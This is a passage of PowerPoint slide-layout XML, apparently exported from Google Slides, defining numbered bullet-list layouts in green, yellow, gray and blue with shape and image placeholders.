        </p15:guide>
        <p15:guide id="2" pos="5460">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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27. Bullets 1–4 (Greens)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 529"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Google Shape;530;p40"/>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4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2" name="Google Shape;532;p4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33" name="Google Shape;533;p4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34" name="Google Shape;534;p4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35" name="Google Shape;535;p4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36" name="Google Shape;536;p4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7" name="Google Shape;537;p40"/>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38" name="Google Shape;538;p40"/>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40"/>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40"/>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40"/>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2" name="Google Shape;542;p40"/>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43" name="Google Shape;543;p40"/>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44" name="Google Shape;544;p40"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Google Shape;545;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="546" name="Google Shape;546;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="547" name="Google Shape;547;p40"/>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28. Bullets 1–4 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 548"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Google Shape;549;p41"/>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4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1" name="Google Shape;551;p4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52" name="Google Shape;552;p4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53" name="Google Shape;553;p4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54" name="Google Shape;554;p4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55" name="Google Shape;555;p4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6" name="Google Shape;556;p41"/>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57" name="Google Shape;557;p41"/>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41"/>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41"/>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41"/>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1" name="Google Shape;561;p41"/>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62" name="Google Shape;562;p41"/>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563" name="Google Shape;563;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="Google Shape;564;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="565" name="Google Shape;565;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="566" name="Google Shape;566;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3082261"/>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29. Bullets 1–4 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 567"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Google Shape;568;p42"/>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4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0" name="Google Shape;570;p4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71" name="Google Shape;571;p4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72" name="Google Shape;572;p4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73" name="Google Shape;573;p4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74" name="Google Shape;574;p4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5" name="Google Shape;575;p42"/>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76" name="Google Shape;576;p42"/>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42"/>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42"/>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42"/>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0" name="Google Shape;580;p42"/>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1" name="Google Shape;581;p42"/>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2" name="Google Shape;582;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="583" name="Google Shape;583;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="584" name="Google Shape;584;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3056198"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="585" name="Google Shape;585;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="17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30. Bullets 1–4 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 586"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="Google Shape;587;p43"/>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4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89" name="Google Shape;589;p4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590" name="Google Shape;590;p4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591" name="Google Shape;591;p4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592" name="Google Shape;592;p4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593" name="Google Shape;593;p4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4" name="Google Shape;594;p43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12225" y="1398000"/>
            <a:ext cx="91440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5" name="Google Shape;595;p43"/>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43"/>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43"/>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43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12225" y="22335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99" name="Google Shape;599;p43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3076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0" name="Google Shape;600;p43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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01" name="Google Shape;601;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="602" name="Google Shape;602;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="603" name="Google Shape;603;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3056198"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="604" name="Google Shape;604;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>
            <a:ext cx="785567"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31. Bullets 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 605"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="606" name="Google Shape;606;p44"/>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4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08" name="Google Shape;608;p4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09" name="Google Shape;609;p4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10" name="Google Shape;610;p4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11" name="Google Shape;611;p4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12" name="Google Shape;612;p4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3" name="Google Shape;613;p44"/>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4" name="Google Shape;614;p44"/>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44"/>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44"/>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44"/>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8" name="Google Shape;618;p44"/>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19" name="Google Shape;619;p44"/>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20" name="Google Shape;620;p44"/>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44"/>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22" name="Google Shape;622;p44"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="623" name="Google Shape;623;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="624" name="Google Shape;624;p44"/>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25" name="Google Shape;625;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="626" name="Google Shape;626;p44"/>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32. Bullets 1–5 (Green/Yellow)">
  <p:cSld name="CUSTOM_2_7_1_4_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 627"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Google Shape;628;p45"/>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4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0" name="Google Shape;630;p4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31" name="Google Shape;631;p4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32" name="Google Shape;632;p4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33" name="Google Shape;633;p4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34" name="Google Shape;634;p4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5" name="Google Shape;635;p45"/>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36" name="Google Shape;636;p45"/>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45"/>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45"/>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45"/>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0" name="Google Shape;640;p45"/>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1" name="Google Shape;641;p45"/>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42" name="Google Shape;642;p45"/>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45"/>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44" name="Google Shape;644;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="645" name="Google Shape;645;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="646" name="Google Shape;646;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="647" name="Google Shape;647;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="648" name="Google Shape;648;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>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33. Bullets 1–5 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 649"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="650" name="Google Shape;650;p46"/>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4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2" name="Google Shape;652;p4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53" name="Google Shape;653;p4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54" name="Google Shape;654;p4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55" name="Google Shape;655;p4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56" name="Google Shape;656;p4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7" name="Google Shape;657;p46"/>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58" name="Google Shape;658;p46"/>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46"/>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46"/>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46"/>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2" name="Google Shape;662;p46"/>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3" name="Google Shape;663;p46"/>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4" name="Google Shape;664;p46"/>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46"/>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66" name="Google Shape;666;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="667" name="Google Shape;667;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Google Shape;668;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="669" name="Google Shape;669;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="670" name="Google Shape;670;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="17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guide id="2" pos="1512">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34. Bullets 1–5 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 671"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Google Shape;672;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362456" y="1300238"/>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4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4" name="Google Shape;674;p4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75" name="Google Shape;675;p4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76" name="Google Shape;676;p4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77" name="Google Shape;677;p4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678" name="Google Shape;678;p4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79" name="Google Shape;679;p47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="131942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0" name="Google Shape;680;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="20025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47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2692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47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="33855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47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="200495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4" name="Google Shape;684;p47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100" y="26952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5" name="Google Shape;685;p47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3385575"/>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86" name="Google Shape;686;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1364850" y="407830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47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4078300"/>
            <a:ext cx="9168600" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="15544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688" name="Google Shape;688;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="689" name="Google Shape;689;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="690" name="Google Shape;690;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="691" name="Google Shape;691;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="692" name="Google Shape;692;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
